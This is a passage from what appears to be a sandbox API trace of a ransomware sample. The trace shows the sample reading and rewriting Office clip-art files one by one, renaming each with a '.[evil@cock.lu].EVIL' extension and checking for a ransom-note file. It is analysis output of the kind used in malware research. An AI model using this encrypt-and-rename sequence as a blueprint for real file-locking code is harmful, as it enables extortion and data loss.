Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF") returned 0x45 [0154.054] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287408.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.056] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcd10, lpOverlapped=0x0) returned 1 [0154.063] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.063] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.063] _errno () returned 0x84b1160840 [0154.063] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.063] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xcd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xcd20, lpOverlapped=0x0) returned 1 [0154.063] CloseHandle (hObject=0x1a8) returned 1 [0154.063] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.064] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.064] __uncaught_exception () returned 0x84b1160800 [0154.064] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.064] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287408.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287408.wmf.[evil@cock.lu].evil")) returned 1 [0154.065] ??_V@YAXPEAX@Z () returned 0x1 [0154.068] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF", dwFileAttributes=0x200) returned 0 [0154.068] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.068] wcsstr (_Str="J0287415.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.068] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF") returned 69 [0154.068] wcscmp (_String1="J0287415.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.068] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287415.WMF") returned 0x0 [0154.068] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF") returned 0x45 [0154.068] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287415.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.070] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa80c, lpOverlapped=0x0) returned 1 [0154.082] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.082] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.082] _errno () returned 0x84b1160840 [0154.082] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.082] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xa820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa820, lpOverlapped=0x0) returned 1 [0154.082] CloseHandle (hObject=0x1a8) returned 1 [0154.082] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.083] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.083] __uncaught_exception () returned 0x84b1160800 [0154.083] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.083] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287415.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287415.wmf.[evil@cock.lu].evil")) returned 1 [0154.084] ??_V@YAXPEAX@Z () returned 0x1 [0154.087] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF", dwFileAttributes=0x200) returned 0 [0154.087] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.087] wcsstr (_Str="J0287417.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.087] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF") returned 69 [0154.087] wcscmp (_String1="J0287417.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.087] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287417.WMF") returned 0x0 [0154.087] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF") returned 0x45 [0154.087] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287417.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.089] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd6bc, lpOverlapped=0x0) returned 1 [0154.095] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.095] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.095] _errno () returned 0x84b1160840 [0154.096] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.096] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xd6c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd6c0, lpOverlapped=0x0) returned 1 [0154.096] CloseHandle (hObject=0x1a8) returned 1 [0154.096] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.096] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.096] __uncaught_exception () returned 0x84b1160800 [0154.096] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.096] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287417.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287417.wmf.[evil@cock.lu].evil")) returned 1 [0154.097] ??_V@YAXPEAX@Z () returned 0x1 [0154.100] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF", dwFileAttributes=0x200) returned 0 [0154.100] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.100] wcsstr (_Str="J0287641.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.100] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG") returned 69 [0154.100] wcscmp (_String1="J0287641.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.100] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287641.JPG") returned 0x0 [0154.100] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG") returned 0x45 [0154.100] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287641.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.102] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x89a4, lpOverlapped=0x0) returned 1 [0154.109] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.109] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.109] _errno () returned 0x84b1160840 [0154.109] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.109] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x89c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x89c0, lpOverlapped=0x0) returned 1 [0154.109] CloseHandle (hObject=0x1a8) returned 1 [0154.109] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.110] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.110] __uncaught_exception () returned 0x84b1160800 [0154.110] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.110] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287641.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287641.jpg.[evil@cock.lu].evil")) returned 1 [0154.111] ??_V@YAXPEAX@Z () returned 0x1 [0154.114] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG", dwFileAttributes=0x200) returned 0 [0154.114] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.114] wcsstr (_Str="J0287642.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.114] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG") returned 69 [0154.114] wcscmp (_String1="J0287642.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.114] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287642.JPG") returned 0x0 [0154.114] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG") returned 0x45 [0154.114] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287642.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.116] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x42d1, lpOverlapped=0x0) returned 1 [0154.121] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.121] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.121] _errno () returned 0x84b1160840 [0154.121] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.121] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x42e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x42e0, lpOverlapped=0x0) returned 1 [0154.121] CloseHandle (hObject=0x1a8) returned 1 [0154.122] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.122] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.122] __uncaught_exception () returned 0x84b1160800 [0154.122] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.122] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287642.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287642.jpg.[evil@cock.lu].evil")) returned 1 [0154.123] ??_V@YAXPEAX@Z () returned 0x1 [0154.126] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG", dwFileAttributes=0x200) returned 0 [0154.126] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.126] wcsstr (_Str="J0287643.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.126] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG") returned 69 [0154.126] wcscmp (_String1="J0287643.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.126] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287643.JPG") returned 0x0 [0154.126] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG") returned 0x45 [0154.126] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287643.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.128] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3e91, lpOverlapped=0x0) returned 1 [0154.134] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.134] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.134] _errno () returned 0x84b1160840 [0154.134] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.134] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3ea0, lpOverlapped=0x0) returned 1 [0154.134] CloseHandle (hObject=0x1a8) returned 1 [0154.134] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.135] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.135] __uncaught_exception () returned 0x84b1160800 [0154.135] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.135] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287643.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287643.jpg.[evil@cock.lu].evil")) returned 1 [0154.136] ??_V@YAXPEAX@Z () returned 0x1 [0154.139] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG", dwFileAttributes=0x200) returned 0 [0154.139] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.139] wcsstr (_Str="J0287644.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.139] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG") returned 69 [0154.139] wcscmp (_String1="J0287644.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.139] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287644.JPG") returned 0x0 [0154.139] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG") returned 0x45 [0154.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287644.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.141] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x43c5, lpOverlapped=0x0) returned 1 [0154.148] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.148] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.148] _errno () returned 0x84b1160840 [0154.148] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.148] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x43e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x43e0, lpOverlapped=0x0) returned 1 [0154.148] CloseHandle (hObject=0x1a8) returned 1 [0154.148] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.148] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.148] __uncaught_exception () returned 0x84b1160800 [0154.149] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.149] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287644.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287644.jpg.[evil@cock.lu].evil")) returned 1 [0154.150] ??_V@YAXPEAX@Z () returned 0x1 [0154.152] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG", dwFileAttributes=0x200) returned 0 [0154.152] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.152] wcsstr (_Str="J0287645.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.152] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG") returned 69 [0154.152] wcscmp (_String1="J0287645.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.153] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287645.JPG") returned 0x0 [0154.153] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG") returned 0x45 [0154.153] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287645.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.154] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8d86, lpOverlapped=0x0) returned 1 [0154.162] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.162] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.163] _errno () returned 0x84b1160840 [0154.163] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.163] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x8da0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8da0, lpOverlapped=0x0) returned 1 [0154.163] CloseHandle (hObject=0x1a8) returned 1 [0154.163] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.163] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.163] __uncaught_exception () returned 0x84b1160800 [0154.163] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.163] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287645.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287645.jpg.[evil@cock.lu].evil")) returned 1 [0154.164] ??_V@YAXPEAX@Z () returned 0x1 [0154.167] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG", dwFileAttributes=0x200) returned 0 [0154.167] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.167] wcsstr (_Str="J0289430.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.167] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG") returned 69 [0154.167] wcscmp (_String1="J0289430.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.167] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0289430.JPG") returned 0x0 [0154.167] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG") returned 0x45 [0154.167] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0289430.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.219] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, 